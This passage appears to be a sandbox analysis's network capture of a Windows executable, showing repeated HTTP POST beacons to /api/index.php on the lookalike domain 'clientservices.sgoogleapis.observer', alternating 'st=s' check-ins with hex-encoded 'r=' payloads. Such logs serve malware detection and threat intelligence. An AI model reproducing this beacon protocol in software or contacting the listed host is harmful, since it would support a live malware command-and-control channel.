              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okK3pqnw%2BXXtlS4ofXi%2Fr4iOltlIi82zNJQcpA4gJyGqY4V2qEjpmr6qSGmuJ4SElQSgvJbo9hxcOGl8N0UrUFBVqrJj7WcZcXL4JvrV53WTmi4Lm5qBdts%2FdTHT31U250N%2FHlc6WBJDWEc%2BpjFyqsiDsGZwxg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea923b9d9b42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.550031104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:01.451821089 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:02.098253965 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:02 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NgAPyT2cOcmeyUT%2FAG0JBaxtSFzYzpRnhH%2FJcP5%2Fw4%2BxSEaBcnyvWcUtbE4RlzQULHKGk%2BKifZsMPtg1ITeH6x%2F4%2FYJoX5Sta4TDrpMRovdFTDYa3QqcqFa0Yb5YiTYXwGaM7w6AJVbZLFKfubKFNSpzTq4og%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9249ade842d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1524&rtt_var=762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.550032104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:03.607430935 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:04.269320965 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:04 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dcWLZAw20ZvqatZ3TwU76SNk53b5%2FLhKZFVlBZS6uEtkyxbwH546YLlR2Vj36Vwm6bV3pqYI78kFm1DP7g0O594BsOUsgi1yq4cND%2Bi5Le6dJA44nrZh3Zd1moOpgK9%2BjTWNND5Uwf%2FGfyddS0VDF8%2Fs2vwpQA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92573f190f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.550033104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:05.914870977 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:06.472740889 CET824INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:06 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HN%2Btncxr5LbcFvZFWOf0iyHt62%2F0wO9M%2BeAGcuM8%2BYlI%2FuK%2BG26dNkS8znxpWS%2B8kZv80UJ7Ram8DLrwkqEmsdodmSzip6ew7F8cdj3p1VfzvGrsTsdjNrZmhL%2F83X3%2Bct%2B3lRu5yejah87HM7UjgACeTEzfUA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92658d2ec443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a
              Data Ascii: 1
              Jan 8, 2025 08:46:06.606909990 CET5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.550034104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:08.130465984 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:08.672053099 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:08 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFOUP3o3geahIDK9COXh6frFYNQP2bhyTD0QZ2p%2BqzeLhdwYCAKl2wnKT0QXJbyQo0SSts%2B1Vb7%2FYGBFMn9tUIUscfdPTr9b%2BEJm8rUOA9h1lFRUj5669Ve0SZNcoPB1IHic40jFASiuQqTMYK0sGHJ%2BzaE5kw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9273481342d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.550035104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:10.316471100 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:10.968169928 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsWI8XEc6%2F0DeGSWXh36Kot%2Faz1BtWUtxSjbR7G4PlM52LHCVt2IuWnIvLkb0lTJLzQRgVQiaVqE4MyhkwUUzOVGoP2uquy2F9j6GaG7mCCFlBqipuks1Ee6rTRyRsPbzbpZ85EmmiXidHTFKKrp1O66r3zOjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92811b947d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.550036104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:12.484935045 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:13.131798029 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:13 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5Xbom8ImQgis3jkC8YFuaTWLiVFI7ncHK0x%2BeR5%2BOlf1qjF%2BMOcvR8Xv837RpIH9PGNEEVwrHpGGyyUNti%2Bq74KgtFvhCsJ2VoglzbRuBQciHtuIXNGYq39PfruBo9L45AUQ4i%2BZfGp8UQWdICSpgaq3K7zSA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea928e9e0a7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.550037104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:14.873193979 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:15.504054070 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:15 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8rRuYVrzEOuHDI%2FSnaDJOtrB1TaoUlPgfPjqtPdqIKi5lHaGEykE5xAPFVmleGrqyWbbpPRUCd3fcJyLiX87WOqHyS7aIwhvMmlLBcJt%2Fw2lrwl9T5DyT6A8Ag%2FZcfaLR5hnPOdO1SOAPCNvLgB%2B6MOXhS1GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea929d7b708c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.550038104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:17.031342030 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:17.583163023 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:17 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6L5hJ9bnPXu4KBg4UwcFJpGQZrCzEitbrl4Hr2uKCF7OQcDeoHih73UFBWHbx%2B2JRGXvIIriD65Q5Lh5fJcbdLQ6CiqjDEU77I1Yn3rwuGAJoaRUW3yfbJYF5iTXeV88BWSjDlf5wIxKxSRwNqcx0m9MgRBM6A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92aaff7443ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1813&rtt_var=906&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.550039104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:19.326617002 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:19.890101910 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:19 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gs8%2FfGx5z3meBarifkQ7ylvvz%2BU3o2TmuLgbecE%2F25%2FJOv4S8b50AwBGEWbUPaxE7XxlvWeB%2F1EagxpxWK1sJUKYz4CPDOrILaL%2FGQhXTM7DwhlmH1CZuXV2HYz%2FCfmnw4GEEspwtJgPmklNIqRG%2BcdMqKeuvg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92b96a3543ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.550040104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:21.404762030 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:21.959530115 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:21 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DHFS1r4Zxaesv7A%2FqPVvlsd7l4M0G70%2FTV2BtWau%2B25HxBd2tenX5QMsQnEtwChMrbRlGPzzpwwtY74o96hOhBPM0sdhnOjcAI%2FxUxsh1YbU0OHdgXRQP7DURqsvkR4fm0KmNLHYhiZWP7rxDaZk%2BP5Y6jSOA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92c6496642d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1502&rtt_var=751&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.550041104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:23.746805906 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:24.388957977 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:24 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48%2FJo2IskKQrQfbd8bVN5N%2FfAyb5H8W9Fi8CAlkdJ8jadqBoKUX5c6dFD4%2BD39rpbGn0i1ow59M%2FsTgwmlA%2F%2FAvkfs0VHMF%2BepND82C45QBlLV53Ihn5YQPZNGxM2Rjo5PbTGchmUbW7i2wm15ck0J%2ByEAo2vw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92d4fefc0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1461&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.550042104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:25.904767036 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:26.540175915 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:26 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BTLZPlKAVPGFf3VfqoHKpnT%2BZW1YNM%2BqgMXsVm5E7JufqbXn78YVpTWUyCWZ%2BwTFadE5pFZmUVWQ21o6oIDMcwRQ84TUQulqvqjNpcyzR4DXluO6kHjU3McR%2BwPYJkX8z1ud8up9OjaCF5FQ0UQ%2BdCYjFe1DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92e26c6643ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1784&rtt_var=892&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.550043104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:28.201379061 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:28.848458052 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:28 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6br0uUyJZlBG24xBn2jPw0nqx8Gjz1UhtoU1Xv5LvRQQSql8pM5mxHbI70kn1Lp%2FiF8LX2h%2B9TZ6HfQhndawrUSUDqHifBLuB0PzuIOISQHab1jfgTqo2Knh92tmpPbVk9nI04eZEODafbeQsuqj0I9Hp%2FY1hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92f0daf08c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1888&rtt_var=944&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.550044104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:30.360249996 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
